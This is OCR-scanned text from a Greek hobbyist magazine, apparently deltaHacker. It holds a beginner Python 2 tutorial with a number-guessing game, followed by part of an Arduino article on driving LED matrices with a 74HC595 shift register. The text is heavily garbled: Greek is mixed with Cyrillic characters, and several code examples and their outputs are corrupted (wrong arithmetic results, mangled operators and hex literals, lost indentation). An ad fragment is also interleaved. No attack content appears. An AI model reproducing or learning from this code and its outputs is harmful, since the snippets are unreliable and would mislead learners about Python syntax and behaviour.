Ας ξεκινήσουμε µε μερικὲς апАёс δοκιμές. Μεταξύ ἄλλων, σε αυτή την Ka- 
τάσταση λειτουργίας της Python µπορείτε να κάνετε πράξεις απευθείας: 

>>> 4/2 

2 

>>> 2579 

15 

>>> 1/2 

θ 
Μηδέν; Ау δεν το καταλάβατε, η διαίρεση που γίνεται εἶναι ακἑέραια, Ka- 
θώς п Python βλέπει бт! τα ορίσματα εἰναι ακἐραια. Αν κάνετε τον vav 
αριθμό δεκαδικὀ, θα πάρετε την απάντηση που περιμένατε: 

>>> 1/2.0 

θ.5 
Το υπόλοιπο της διαίρεσης, ο γνωστὸς τελεστής mod, στην Python oup- 
βολίζεται µε το χαρακτήρα «90»: 

>>> 1 % 2 

1 

»»» 523 

2 
Αν θέλετε να υψώσετε Eva αριθμὀ σε µια δύναμη δίνετε кат! σαν 

>>> 2%%24 

16777216 


Ακόμα πιο ενδιαφἑρον εἶναι От! n Python μπορεί να кау απευθείας пра- 
Егіс σε δεκαεξαδικὀ, οκταδικὀ και δυαδικὀ σύστημα. Па δεκαεξαδικὀ, 
γράψτε τον αριθμό ξεκινώντας µε Ох και για δυαδικό µε Ob: 


>>> ΘΧΕΕ 
255 

>>> 001100 
12 
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Μεταβλητέὲς 


Όπως πιθανώς θα ξέρετε, µια μεταβλητή εἶναι Eva буора που αντιπρο- 
σωπεύει µια τιµή. Χρησιμοποιώντας μεταβλητές εἶναι δυνατὸν να φτιά- 
χνουµε προγράµµατα που λύνουν Eva πρόβλημα µε γενικὀ τρὀπο, αφού 
σε κάθε εκτέλεση του προγράµµατος μπορούμε v’ αλλάζουμε боуашка 
τα διάφορα μεγέθη. Ας δούµε Eva прото και απλοϊκό παράδειγµα χρήσης 
μεταβλητών: 

>>> а-5 

>»>Зағ5 

25 

>>> 88 

125 


Χμ. Αυτὸ δεν ἦταν και τόσο δυναμικό, οὐτε ιδιαίτερα βολικὀ. Μάλλον 
πρέπει να ασχοληθούμε µε την εἰσοδο ano το χρήστη (user input) και 
την εκτὐπωση/ἐξοδο. Па να ζητήσουμε апо το χρήστη ша τιµή την ора 
που εκτελείται το πρὀγραμμα, μπορούμε να χρησιμοποιήσουμε την input. 
H τιµή аот µπορεί να αποθηκευθεὶ απευθείας σε ша μεταβλητή, ὁπως 
φαίνεται παρακάτω: 

>>> age=input(“What is your age? ") 

What is your age? 24 

>>> print age 

24 


Ὅπως καταλάβατε, η εντολἠ print χρησιμοποιείται για уа τυπώσουμµε кайт! 
στην οθόνη. Μπορεί να εἶναι ἑνα μήνυμα (σε εισαγωγικάἆ), µια τιµή ἡ η 


Commodore 64, 
το μηχάνημα µε то 
ρεκὀρ πωλήσεων 
όλων των εποχών! 
Και τώρα η (νέα) 
Commodore то 
ξαναβγάζει -- алла 
µε Core i7 μέσα. 
Αν του τρέξετε 
Windows θα το Өє- 
ωρήσω ιεροσυλία! 
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τιµή µιας μεταβλητής. Φυσικά, µπορεί να εἶναι και συνδυασμὸς των па- 
ραπάνω: 


>>> print age,"is not too bad!" 


24 is not too bad! 


Ἔτοιμοι για To HelloWorld 


Εντάξει, εμεἰς θα φτιάξουμε ша ενδιαφἐρουσα παραλλαγή. Av χρησι- 
μοποιείτε To IDLE, επιλέξτε апо το μενού File -> New Window για να 
βρεθεἰτε σε Evav απλὀ editor. Μπορείτε βέβαια να χρησιμοποιήσετε και 
οποιονδήποτε ἀλλο text editor θέλετε (το vim εννοούμε фиска, εκτὸς αν 
θέλετε уа σας κοροϊδεύω). Γράψτε λοιπόν τα ακόλουθα: 


name=raw_input("What is your name? ") 
age=input("What is your age? ") 

print "Pleased to meet you ",name 
print age, " is not too bad!" 


Αποθηκεύστε To ως «hello.py». Στο IDLE, μπορείτε να піеоте F5 για va 
εκτελεστεἰ. Σε κάποιο ОМІХовғідес λειτουργικὀ, µπορείτε уа τρέξετε TO 
πρόγραμμα και апо τη γραμμή εντολών: 


$ python hello.py 


Ауаротіеоте TI εἶναι το raw_input; Πειραματιστεἰτε βάζοντας окёто input 
και бєїтє τι συμβαίνει. Μετά, δώστε то буора σας σε εισαγωγικἀ. Mnopei- 
те уа βρείτε γιατὶ συμβαίνει αυτό; Θα σας το αποκαλύψουμε στο επόμενο 
ἆρθρο µας! Πα την ора μπορούμε να γράψουμε το прото µας text-based 
game! 


Μάντεψε τον αριθμό v.1 


Γράψτε το παρακάτω πρὀγραμμα ка! αποθηκεύστε το ως <guess.py> ñ 
όπως αλλιώς θέλετε. Στη συνέχεια EKTEAEOTE το, ὁπως εἰδαμε προηγου- 
μένως. 


# 
# Μάντεψε τον αριθµό v.1 
# 
import random 
thenumber=random.randint(1,50) 
print "Ехш σκεφτεί ένα αριθµό από το 1 ως to 50." 
print "Μπορείς να τον βρεις;" 
guess=0 
while guess<>thenumber: 
guess=input("AWoe τον αριθµό: ") 
if guess>thenumber: 
print Ἔδωσες μεγαλύτερο αριθµό!" 
if guess<thenumber: 


print Ἔδωσες μικρότερο αριθµό!" 
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if guess==thenumber: 
print "Τον βρήκες!!!" 


Προσοχή! Та κενὰ εἶναι σημαντικά. H Python δεν έχει ἄγκιστρα, αγκύλες 
ἡ κάποιον ἄλλον ano τους χαρακτήρες που χρησιμοποιούν οι υπόλοιπες 
γλὠσσες για να ομαδοποιούν τις EVTOAEG. П’ αυτό то окопо, χρησιμοποιεἰ 
τα κενὰ ἡ та TABs. Παρατηρεἰστε, N.X., OT! Лс οι EVTOAEG κάτω апо τη 
while εἶναι δύο κενὰ διαστήματα πιο μέσα. AUTO σημαίνει OT! οι συγκε- 
κριμένες εντολὲς ανήκουν στο βρὀχο while. Κάτω ano κάθε if, η εντολἠ 
εἶναι επἰσης δύο διαστήματα πιο μέσα. Σε ὀλες τις γλὠσσες εἶναι καλὸ 
να στοιχἰζουµε το πρόγραμμα µας σωστὰ, ὥστε να εἶναι ευανάγνωστο. 
Στην Python αυτό εἶναι υποχρεωτικὀ, καθώς η στοίχιση εἶναι µέρος του 
συντακτικού της! 


Ανάλυση, γραμμὴ προς γραμμή 
Ας δούμε тора боа ἐχει να μὰς διδάξει το прото µας πρόγραμμα, για то 
συντακτικὀ και τη λογικἠ της Python... 

import random 


Edw δηλώνουμε στην Python бт! θέλουμε να χρησιμοποιήσουμε Tn βιβλι- 
οθήκη (module) random. Μέσα σε αυτήν περιἐχονται συναρτήσεις που 
παράγουν τυχαίους αριθμούς! 

thenumber=random.randint(1,50) 
Χρησιμοποιούμε τη συνάρτηση randint για уа παράγουµε ἐναν ακέραιο, 
τυχαίο αριθμό, апо το 1 ως то 50. H περιοχἠ στην οποία θα βρἰσκεται ο 
Tuxaioc αριθµός καθορἰζεται апо τον τρόπο µε тоу οποίο καλέσαμε τη ou- 
νάρτηση και συγκεκριµένα апо τα ορἰσματα που της δώσαμε. О τυχαἰος 
αριθμὸς αποθηκεύεται στη μεταβλητή thenumber. 

print 'Έχω σκεφτεί έναν αριθµό από το 1 ως το 50." 

print "Μπορείς να τον βρεις;" 
Εδὠ νομἰζουµε οτι δεν χρειάζεται καμία επεξήγηση :) 

guess=0 


Н арҳік TIEN για τη μεταβλητή guess. H εν λόγω ugraBÀnrTn (guess) θα 
αποθηκεύει τον αριθµὀ που δίνουμε κάθε φορά, ката την εκτέλεση του 
προγράμματος. Εδὠ της δίνουμε την αρχική τιµή 0, ώστε να βρίσκεται 
σίγουρα εκτὀς του διαστήματος ano 1 ¿wG 50. Έτσι, εξασφαλἰζουµε ὅτι η 
επόμενη EVTOAN θα εκτελεστεὶ και το παιχνἰδι θα ξεκινήσει... 

while guess<>thenumber: 


Edw λοιπὸν, Аёнє στην Python να εκτελέσει ὁσα ακολουθούν, για ὁσο n 
τιµή της guess εἶναι διαφορετικἠ (<>) ano την τιµή που ἐχουμε αποθη- 
κεύσει στη μεταβλητή thenumber. Καθώς η архік τιµή της guess εἶναι 
το μηδὲν, το πρὀγραμμα θα προχωρήσει στα σίγουρα. 


guess=input("AWoe τον αριθµό: ") 
Προφανώς, µε το παραπάνω μὰς ζητάει τον αριθμό. 
if guess>thenumber: 
print '"Ἔδωσες μεγαλύτερο αριθµό..." 
Αν ο χρήστης έδωσε μεγαλύτερο αριθµὀ, τυπώνεται το ανάλογο μήνυμα. 
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if guess<thenumber: 
print 'Έδωσες μικρότερο αριθµό..." 


Αν ο χρήστης ἐδωσε μικρότερο αριθμό, τυπώνεται пал! Eva κατάλληλο 
μήνυμα. 


if guess==thenumber: 
print "Το βρήκες!!!" 


Αν ο χρήστης βρήκε τον αριθμὀ, τυπώνεται το νικητήριο μήνυμα! Napa- 
τηρείστε ὁτι о ἐλεγχος ισότητας γίνεται µε δύο ἰσον (==). То Eva ἴσον 
χρησιμοποιείται για να ορίσουµε µια μεταβλητή (να της αποδώσουµε ша 
τιμὴ). Σε ὀλες τις περιπτώσεις то πρὀγραμμα επιστρέφει στην αρχἠ της 
while, ano ὀπου και ξεκίνησε. Ωστόσο αν ο αριθµός που ἐδωσε ο χρήστης 
εἶναι ἰσος µε το thenumber η συνθήκη Tou while δεν ισχύει πλέον και TO 
πρόγραμμα τερματίζεται. 


Ασκήσεις για το σπίτι 


Ευνόητο εἶναι От! για να μάθετε προγραμματισμὀὸ δεν αρκεί να αντιγρά- 
φετε προγράμματα άλλων. Βελτιώστε λοιπὸν το παραπάνω πρόγραµµα µε 
τους ακὀλουθους τρόπους: 


Να ζητάει το ὀνομα του χρήστη και να το ενσωματώνει στο νικητήριο µή- 
уона. Πα παράδειγµα, να εμφανίζει кат! σαν αυτό: «Συγχαρητήρια Πώρ- 
yo, το βρήκες!» 


Προσθέστε µια μεταβλητή count, στην οποία θα δώσετε αρχικἁ την τιµή 
0. Κάθε φορά που ο χρήστης θα δίνει Eva αριθµὀ, η τιµή της µεταβλη- 
τὴς θα αυξάνεται ката ша μονάδα (count=count+1). Κάθε фора που о 
χρήστης βρίσκει τον αριθµό, μαζί µε то буора και τα συγχαρητήρια va 
τυπώνεται και το πλήθος των προσπαθειών του. 


Αφού κάνετε το προηγούμενο, ENEKTEIVETE το проүрарра WOTE дтау о 
χρήστης μαντεύει τον αριθμό µε την πρώτη προσπάθεια να εμφανἰ- 
ζεται το μήνυμα «Beginner’s luck!>. Όταν τον μαντεύει µε πέντε ТО 
πολὺ προσπάθειες, να τυπώνεται το μήνυμα «Εἶσαι γρήγορος» κι 
Отау τον μαντεύει µε πάνω ano πέντε προσπάθειες, να εμφανί- 

ζεται το μήνυμα <H γιαγιά µου παἰζει πιο кала!» 


Τις λύσεις των ασκήσεων τις δίνουμε στο http://deltahacker.gr/?p=4170. 

Ελπἱζουμε βέβαια να µην τις χρειαστείτε. Πα την ακρίβεια, ελπίζουμε 

να περάσετε va ευχάριστο χειμωνιάτικο απὀγευμα, βρἰσκοντας τις 
λύσεις μόνοι σας! 


Υστερὀγραφο: Μήπως πρέπει уа кратӣтє τα sources των ασκήσεων 

σε ¿va mercurial repository; Λέω εγώ тора :) (Σ.τ.Ε. Ναι, ἰσως πρέπει 

-- και OOO! ¿xouv τα τεύχη 003 και 004 του deltaHacker ξέρουν πολύ 
καλὰ τι εννοούμε.) 


Εσείς τι δικαιολογία έχετε που n διαφήμισή σας απουσιάζει από εδώ; 


Τολμήστε να µας την πείτε από το talk2us@deltahacker.gr. Όπως και να “χει θα 
επικοινωνήσουμε κι εμείς μαζί σας - ή έστω µε τον ανταγωνιστή σας ;) 
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| 
Meta ano σελίδες Eni σελίδων θεωρίας και 1 
πολλὲς HIKPOKATAOKEUEG, έφτασε η ора 
να φτιάξουμε KATI μεγάλο. Κάτι періпЛоко 1 
GUYKDITIKG µε боа ἔχουμε δει, αλλά кі αρκετά і 
εντυπωσιακὀ. Παρεμπιπτόντως, AUTÒ то 
«κάτι» θα ‘vai και διασκεδαστικὀ. Αλήθεια, I 
το oT! θα εἶναι δύο αυτά τα «κάτι», то εἶπαμε; 
Μάλλον ὀχι. Енгіс πάντως περάσαμε αρκετέὲς | 
ὠρες χαζεύοντας TO va «κάτι» και πολύ 
περισσότερες παἰζοντας µε το ἄλλο. Εσεἰςτι θα 
κάνετε, πἐρα апо то να µας συγχωρήσετε ү!” 
αυτόν τον εξαιρετικἀ γενικὀ πρόλογο; 
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Στο deltaHacker 004 εξετάσαμµε τον «παραδοσιακὀ» τρόπο σύνδεσης και 
ελέγχου EVOG keypad. Στη συνέχεια προχωρήσαμε σε εξεζητημένες TE- 
XVIKEG, που επιτρέπουν τη διασύνδεση πολλών διακοπτὠν (ακόµα και 
ολόκληρων keypad) επάνω σε *Evav μόνο” ακροδέκτη του Arduino. Όλα 
αυτά μοιάζουν (και εἶναι) βαρετὰ θέματα, μέχρι τη στιγμή που γίνονται 
ενδιαφἐροντα. Πέρα апо την πλάκα, οι σχετικἐς τεχνικὲς αποδεικνύονται 
εξαιρετικἁ πολύτιμες Отау σκοπεύουµε να κατασκευάσουµε Eva μεγάλο 
project. Εμεἰς βέβαια δεν περιοριστήκαµε µὀνο στους διακόπτες. Γνω- 
рісар= και ша ενδιαφἐρουσα εφαρμογἠ του multiplexing, σε συνδυα- 
σμὸ µε το φαινόμενο POV (Persistence Of Vision). Έτσι, καταφέραμε να 
συνδέσουµε στο Arduino ша μικρή συστοιχία апо LED (µια διάταξη LED 
matrix 5х7) και να προβάλουµε πάνω της ἑνα τμήμα του λογότυπου του 
περιοδικού. 


Σε αυτὀ το άρθρο θα καταπιαστούμε µε μεγαλύτερα LED matrix και θα 
γνωρίσουμε Eva πραγµατικἀ χρήσιμο εργαλείο: Eva εὐχρηστο τσιπάκι, 
µε τη βοήθεια του οποίου μπορούμε να αυξήσουμε τις εξόδους Arduino. 
Μην πάει το μυαλὀ σας σε τίποτα εξεζητημένο. Πρόκειται για ἑνα pi- 
кро, Фтпуд και πολύ διαδεδομένο τσιπ, το οποίο μπορούμε va βρού- 
µε σε όλα τα καταστήματα ηλεκτρονικὠν εξαρτημάτων. Μην νομίζετε 
όμως дті σκοπεύουµε να περιοριστούµε στη θεωρία. Та LED matrix εἶναι 
εξαιρετικἁ διαδεδομένα στους χομπίστες και χρησιμοποιούνται συχνά σε 
πολλὰ projects. Βλέπετε, αυτές οι µικρές διατάξεις LED προσδίδουν µια 
αἴσθηση ρετρὀ σε каӨе project, λειτουργούν σαν πρὠτης τάξεως οθὀνες 
για μικρὰ παιχνιδάκια και ο προγραμματισμός τους παρουσιάζει аркетд 
ενδιαφἑρον. Σε GUTO το μέρος της σειράς, λοιπὸν, θα κατασκευάσουµε 
Eva ραλάκι καθώς και το πασίγνωστο Game of Lifet. Οι μεγαλύτεροι θα 
θυμηθούν τα νιάτα τους και θα γνωρίσουν πλευρὲς αυτών των συστημά- 
των που ποτὲ δεν γνώρισαν, ενώ οι μικρότεροι μπορούν να ξεψαχνίσουν 
τις κατασκευαστικές ка! προγραμματιστικἐς λεπτομέρειες. 


Πρώτη επαφἠ 


Па το μικρό LED matrix των 35 pixel (5х7), εἰχαμε γράψει ша μικρὴ και 
απλοϊκή εφαρμογἠ. Αναφερόμαστε στο проүрацра το οποίο συνόδευε то 
προηγούμενο ἀρθρο της σειρᾶς, στο τεύχος 004. Το прбүранна ενεργο- 
ποιούσε κάθε фора μία από Tic πέντε γραμμές του matrix και «οδηγούσε» 
τα LED της συγκεκριμένης γραμμής σύμφωνα µε τα περιεχόμενα ενὸς 
піуака. O εν λόγω πἰνακας διέθετε πέντε byte. Κάθε byte αναφερόταν 
σε ша γραμμὴ Tou matrix, ενώ κάθε bit προσδιόριζε την κατάσταση ενὸς 
μεμονωμένου LED επάνω στη αντίστοιχη γραμμή. Πα παράδειγµα, το Tpi- 
το bit του δεύτερου byte προσδιὀριζε την κατάσταση του τρίτου LED στη 
δεύτερη γραμμή και πάει λέγοντας. Το πρὀγραμμα περνούσε апо τη ша 
γραμμὴ LED στην επόµενη πολύ γρήγορα, µε αποτέλεσµα να προκαλείται 
µια ενδιαφέρουσα οφθαλμαπάτη: Στο μάτι ἐμοιαζαν ὀλες οι γραμμές των 
LED ενεργοποιημένες ταυτόχρονα. Με αυτόν τον τρόπο πάνω στο matrix 
σχηματιζόταν µια ολοκληρωμένη εικόνα. Έτσι, στηριζὀµενο στη µεγάλη 
του ταχύτητα, το πρὀγραμμὰ µας κατάφερνε να προβάλλει επάνω στο 
LED matrix Eva μικρὸ, αναποδογυρισµένο δέλτα. 


Το αντίστοιχο κύκλωμα тау ακόµα πιο απλὀ. Κάθε ακροδέκτης του LED 


1. Πρόκειται για éva μαθηματικό μοντέλο µε ελάχιστους και απλούς κανόνες. Ωστόσο, η εφαρµογή του 
επάνω σε ἐναν піуака απὀ κουκίδες (κελιά) δημιουργεί μοτίβα τα οποία εναλλάσσονται хаотка ка! μοιάζουν 
να περνούν διαρκώς and την τάξη στο хаос кі αντίστροφα. Μπορείτε να διαβάσετε περισσότερα στο σχετικὀ 
λήμμα της Wikipedia (http://en.wikipedia.org/wiki/Conway's_Game_of_Life) αλλά κι εδώ: www.bitstorm.org/ 
gameoflife. 
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matrix κατέληγε σε Evav ακροδέκτη Tou Arduino. Με αυτὀν τον τρόπο 
εἰχαμε δεσμεύσει 12 акробёктєс: 5 για τις γραμμές και ἄλλους 7 για 
τις στήλες. Н συγκεκριμένη υλοποίηση αποτελούσε ша απλούστατη και 
γρήγορη λύση, η опоіа αποσκοπούσε µόνο σε µια πρὠτη γνωριμία µε τα 
LED matrix και το χειρισµὀ τους. AUTH τη фора ωστόσο θα παἰξουμε µε 
matrix των 8x8 LED. Συνεπώς, αν ακολουθούσαμε πάλι την ἴδια TAKTI- 
Kn θα χρειαζόμασταν 16 ακροδέκτες. Όπως αντιλαμβάνεστε, κάτι τέτοιο 
συνιστά τεράστια σπατάλη υλικού. Εξάλλου, σκεφτείτε ті θα συνέβαινε 
στην περίπτωση που θα θέλαμε να συνδέσουµε δύο τέτοια matrix, ὥστε 
να σχηματίσουμε ша οθὀνη των 8x16 LED. Θα χρειαζόμασταν τότε 24 
акробектес, уф то Arduino διαθέτει μόλις 20. 


Βολική συσκευἠ 


Πριν προχωρήσουμε εἶναι φανερό бт! πρέπει να λύσουμε το ζήτημα των 
акробектоу. Το multiplexing δεν μπορεὶ να µας βοηθήσει auth τη фора. 
Επομένως, θα πρέπει να επιστρατεύσουµε πρὀσθετο hardware. Με апла 
λόγια, αυτό που χρειαζόμαστε εἶναι μία συσκευἠ µε αρκετὲς εξόδους, η 
οποία να συνδέεται στο Arduino και va του δίνει τον πλήρη ἐλεγχο των 
εξόδων της. Βέβαια, αν για τον ἐλεγχο αυτής της συσκευἠς χρειαζόμαστε 
À ακροδέκτες του Arduino, η συσκευἠ µε τη ора της θα πρέπει να µας 
προσφἑρει περισσὀτερες απὀ À εξόδους. Διαφορετικά, аут! να επωφελη- 
θούμε апо τη χρήση της, θα έχουμε χάσει ακροδέκτες. Με άλλα λόγια, 
χρειαζόμαστε µια συσκευἠ µε πολλὲς εξόδους οι οποίες θα ελἐγχονται/ 
οδηγούνται απὀ ελάχιστες εισόδους. E, λοιπὀν, αυτό που ζητάμε υπάρχει 
και ονομάζεται shift register. Φανταστείτε Eva κουτὶ στο οποίο τα δεδο- 
μένα εισέρχονται σειριακἁ και εξέρχονται παράλληλα. Σε αυτὸ το кошті 
OTEAVOUHE τα δεδομένα µας bit προς bit. Όταν του δώσουμε την катал- 
ληλη εντολἠ εμφανίζει όλα τα bit ταυτόχρονα, σε µια σειρἀ ακροδεκτὠν. 
‘Eva δημοφιλές τσιπάκι που πετυχαίνει τα παραπάνω εἶναι το 74HC595. 


8-ΒΙΤ STORAGE REGISTER 


3-STATE OUTPUTS 


ЕЛЕЛЕЗЕЛЕЛЕЗЕЗ 
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Εικόνα 1 

Το διάγραμμα ενὀς 
Z4HC595. Στην 
εικόνα διακρίνονται 
τα τρία τμήματα 
που απαρτίζουν 

το TOINGKI, όπως 
επίσης οι εἰσο- 

бог Kal ἐξοδοι 

του καθενός. Σε 
γενικὲς γραμμὲς 
και σε ἑνα τυπικὀ 
σενάριο χρήσης, Τα 
δεδομένα εισἐρχο- 
ута! σειριακἁ ano 
την εἰσοδο του 
πρώτου τμήματος 
(DS - Data Serial) 
και HE TO ρυθμό 
που καθορίζει η 
εἰσοδος 5НСР 
(shift register clock 
pulse). Отау εµφα- 
νιστεί ἑνας παλμός 
στην εἰσοδο 5ТСР 
(storage register 
clock pulse) та 
δεδομένα TOU σει- 
plakou καταχωρη- 
τή μεταφέρονται 
στον αποθηκευτικὀ 
χώρο του τσιπ. 
Ano εκεί, εφόσον 
το τρίτο Kal TEAIKO 
τμήμα του τσιπ το 
επιτρέψει, τα δεδο- 
μένα µας εμφανί- 
ζονται παράλληλα 
στις εξόδους. 
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74НС595 shift register 


To εν λόγω τσιπ αποτελεἰ ¿vav οκτάµπιτο катахорптп τύπου SIPO (Serial 
Іп - Parallel Out). Αυτό σηµαίνει ότι µπορεί δεχτεἰ σειριακἁ 8bit δεδοµέ- 
νων και να τα εμφανίσει παράλληλα, σε окто ακροδέκτες. Πα την ευκολία 
μας, ὠστόσο, то τσιπάκι διαθέτει μερικὲς πρόσθετες λειτουργίες οι οποίες 


Εικόνα 2 

Η κλασική συσκευ- O 

AOU LOOO Di Š ° Q y 
> 


χομπίστες ονομά- 


(9 

O 
ζεται DIP (Dual 
In-line Package). B = B 
О! акродектес 
αυτἠς της συσκευ- 
ασίας τοποθετού- 
νται εὐκολα σε 
breadboard αλλά 
και σε βάσεις για 
ολοκληρωμένα, 
χωρίς να απαιτούν 
κόλληση ἡ κάποιο 
εξειδικευμένο 
εργαλείο. Όπως 
φαίνεται ка! στην 
εικόνα, η αρίθμηση 
των ακροδεκτών 
ξεκινά απὀ πάνω 
αριστερά και 
συνεχίζεται κατά 
τη θετικἠ фора 
(αντίθετα απὀ τους 
δείκτες του ро- 
λογιού). H «πάνω 
πλευρά» του τσιπ 
σημειώνεται µε ша 
μαύρη κουκἰδα (η 
οποία τοποθετείται 
δίπλα στον ακρο- 
δέκτη 1) ἡ µε µια 
µικρή, ημικυκλική 
εσοχή. 


74НС595 
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δεν περιγράφονται απὀ то ὀνομά του. Συγκεκριμένα, εντὸς του 74HC595 
βρίσκεται ἑνας οκτάµπιτος καταχωρητής µε σειριακἠ εἰσοδο *kqI* ἐξοδο, 
ἑνας ακόµα октарпітос̧ καταχωρητής, καθὼς και µια οκτάμµπιτη βαθμίδα 
buffer, η οποία οδηγεί τις εξόδους του τσιπ (βλ. εικὀνα 1). Αναρωτιέστε 
og TI εξυπηρετούν όλα αυτά; Ας τα πάρουμε µε τη ора... 


То прото τμήμα ἐχει τη σημαντικότερη αποστολή: Τη μεταφορὰ δεδομὲ- 
νων προς το τσιπ σειριακἀ και ара µε τους ελάχιστους δυνατούς акро- 
δέκτες. Па το σκοπὀ αυτό η συγκεκριμένη βαθμίδα διαθέτει τρεις акро- 
δέκτες: "уау για τη μεταφορὰ των δεδομένων bit προς bit (serial data), 
vav για το συγχρονισμὀ του σειριακού καταχωρητἠ µε то Arduino (shift 
register clock) και ἑναν ακὀµα που επιτρέπει το μηδενισμό (το καθἀρι- 
она) του σειριακοὐ καταχωρητή (master reset). Τέλος, то εν λόγω τμήμα 
διαθέτει και µια ортак ἐξοδο, που καταλήγει σε EEXWPIOTO ακροδέκτη 
του τσιπ (serial data output). Αυτή η ἐξοδος μὰς επιτρέπει να συνδέσου- 
µε πολλούς shift register διαδοχικἀ (τον Evav μετά τον ἄλλο), WOTE να 
OTEAVOUHE δεδοµένα σε όλους χρησιμοποιώντας μόνον την εἰσοδο του 
πρώτου. Με αυτή τη συνδεσμολογία μπορούμε να ελέγχουμε πολλούς 
shift register, χρησιμοποιώντας τους ἴδιους ακροδέκτες. 


Το δεύτερο τμήμα λειτουργεἰ σαν µια προσωρινἠ μνήμη, ὀπου αποθηκεύ- 
ονται τα δεδοµένα τα οποία ἐχει δεχτεί ο σειριακὸς καταχωρητής. Με τη 
μεσολάβηση αυτἠς της μικρὴς μνήμης οι ἐξοδοι του τσιπ απομονώνονται 
ano τον σειριακὀ καταχωρητή. Па уа κατανοήσετε τη χρησιμότητα αυτού 
του τμήματος, σκεφτείτε τι θα συνέβαινε αν ο σειριακὸς καταχωρητής 
ἠταν συνδεδεμένος απευθείας στις εξόδους: Отау στέἐλνουµε Eva byte, 
та bit που το απαρτἰζουν φτάνουν διαδοχικά, το Eva μετά то ἄλλο. Όμως 
επειδἠ ο καταχωρητής εἶναι CEIPIAKOG, μέχρι να φτάσει κάθε bit στη θέση 
του διέρχεται апо ὀλες τις ενδιάμεσες θέσεις του καταχωρητή. Επομέ- 
νως, αν απουσίαζε το τµήµα της προσωρινἠς μνήμης, η κατάσταση των 
εξόδων θα άλλαζε διαρκώς, μέχρι να ολοκληρωθεἰ η αποστολἠ Tou byte. 
Με λίγα λόγια, ог ἑξοδοι θα παρουσίαζαν αλλοπρόσαλλη, φαινομενικἀ 
τυχαία συμπεριφορά. Με τη βοήθεια της προσωρινἠς μνήμης που παρεµ- 
βάλλεται, εξασφαλἰζουµε бт! οι ἐξοδοι του τσιπ θα ενημερώνονται και θα 
αλλάζουν жрӧуоу* όταν το επιθυμούμε, Отау δηλαδἠ ἐχει ολοκληρωθεἰ 
η αποστολἠ ενὀς byte. Όπως αντιλαμβάνεστε, το συγκεκριµένο τµήµα 
διαθέτει Evav ακροδέκτη εισόδου (storage register clock). Οποτεδήποτε 
στείλουμε ἑναν παλμὸ: στο συγκεκριµένο ακροδέκτη, οἱ ἐξοδοι του τσιπ 
ενημερώνονται και προβάλλουν τα δεδοµένα που περιέχει εκείνη τη στιγ- 
μὴ ο σειριακὸς καταχωρητής. 


Το τελευταίο τμήμα, η βαθμίδα buffer, έχει τον πλήρη ἐλεγχο των εξόδων 
του τσιπ. Εν ολίγοις, μπορεί να τους θέτει στη λογική κατάσταση που 
καθορἰζει η προσωρινἠ μνήμη (το δεύτερο τμήμα του τσιπ) ἡ στην ката- 
σταση floating (ονομάζεται και high-Z). Με ἀλλα λόγια, η συγκεκριμένη 
βαθμίδα επιτρέπει τη φυσιολογική εμφάνιση των δεδομένων επάνω στις 
εξόδους του τσιπ ἡ την πλήρη απενεργοποἱησή τους», П’ αυτὸ το λὀγο, η 
συγκεκριμένη βαθμἰδα διαθέτει Evav ακροδέκτη εισόδου (output enable), 
η λογική κατάσταση του οποἰου καθορἰζει τη συμπεριφορά της. 

2. Με Tov бро «παλμό» εννοούμε τη µεταβολή της λογικής κατάστασης δύο φορές. Για παράδειγµα, and то 


λογικὀ μηδὲν στο λογικὀ Eva και µετά πάλι στο λογικό μηδὲν. 
3. Επειδή οι ἐξοδοί του μπορούν να τεθούν σε τρεις καταστάσεις, ονομάζονται tri-state outputs. 


71 


YV HAQKER 


ÁN 


13 3 4 10 6 


11 15 16 


} 
Ë 
1% 
К 
|“ 
IN 
š 


Εικόνα 3 

To LED matrix пои 
επιλέξαμε διαθέτει 
τετράγωνα pixel! 
(Ναι, авто ἦταν то 
κυριότερο κριτήριο 
επιλογής.) Στην 
εικόνα φαίνεται 

η διάταξη των 
ακροδεκτών TOU 
Kal η λειτουργία 
καθενός. Όλα аита 
βέβαια ισχύουν για 
το δικὀ µας matrix 


(NFM-12883AS-11). 


Av χρησιμοποιήσε- 
те Κάποιο ἆλλο θα 
πρέπει να ενηµε- 
ρωθείτε για τους 
акродектес του 
απὀ το datasheet 
του κατασκευαστή. 
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Τι κερδίζουμε, TEAIKG; 


Σε αυτὸ το σημεὶο εἶναι πολύ пібауд να λύθηκαν ὀλες οι αρχικὲς апорі- 
ες, αλλά να προέκυψε μία νέα: Σύμφωνα µε την παραπάνω περιγραφή, 
για τον πλήρη ἐλεγχο του τσιπ διατίθενται πέντε ακροδέκτες. Επομὲ- 
νως, για να αποκτήσουμε τον πλήρη ἐλεγχο των окто εξόδων του τσιπ 
πρέπει να δεσμεύσουμε πέντε ακροδέκτες του Arduino. Έτσι δεν εἶναι; 
Έτσι εἰναι, αλλά µόνο ὁταν επιθυμούμε τον «πλήρη ἐλεγχο» των εξόδων 
του 74HC595. Ορισμένες λειτουργίες του 74НС595 εἶναι μᾶλλον εξεζη- 
τημένες και απαιτούνται σε ελάχιστες περιστάσεις. Χρησιμοποιώντας TOV 
shift register για τον ἐλεγχο ενός LED matrix και µε την προὐπόθεση бт! 
έχουμε σχεδιάσει σωστά τον κὠδικά µας, χρειαζόμαστε µὀνο τρεις акро- 
δέκτες! Βλέπετε, στην εφαρμογἠ που εξετάζουμε μπορούμε να έχουμε 
πάντοτε ενεργοποιημένες τις εξόδους του τσιπ. AUTO σημαίνει От! pno- 
ρούμε να συνδέσουμε τον акробектп «output enable» σταθερἁ στα Ον. 
Επιπρόσθετα, καθώς θα στέλνουµε τα δεδοµένα avd октабес bit (ava 
ολόκληρα byte), δεν θα χρειαστεἰ NOTE να καθαρἰσουµε τον σειριακὀ KA- 
ταχωρητή, αφού та παλιὰ δεδομένα θα «καλύπτονται» πάντα апо τα νέα. 
Ἐτσι, μπορούμε να συνδέσουµε μόνιμα τον ακροδέκτη «master reset» 
του τσιπ στα 5V4. Τελικά, για τον ἐλεγχο των окто εξόδων ενός 74HC595 
δεσμεύονται μόνο τρεις ἐξοδοι του Arduino (ἑνας για то «serial data», 
ἑνας για To «shift register clock» κι ἑνας για To «storage register clock»). 


То κύκλωμα 


Αν υπάρχουν ακόµα апор!єс για τη λειτουργία και τη χρησιμότητα του 
74Η 0595, µην ανησυχείτε καθὀλου. Θα λυθούν ὁλες πολὺ σύντομα. 
Έφτασε η ора να εξετάσουμε το κύκλωμα, στο опоіо θα βασιστούν та 
δύο παιχνιδάκια µας. 


Το ζητοὐμενὸ µας εἶναι να συνδέσουμε Eva LED matrix 8x8 πάνω στο 
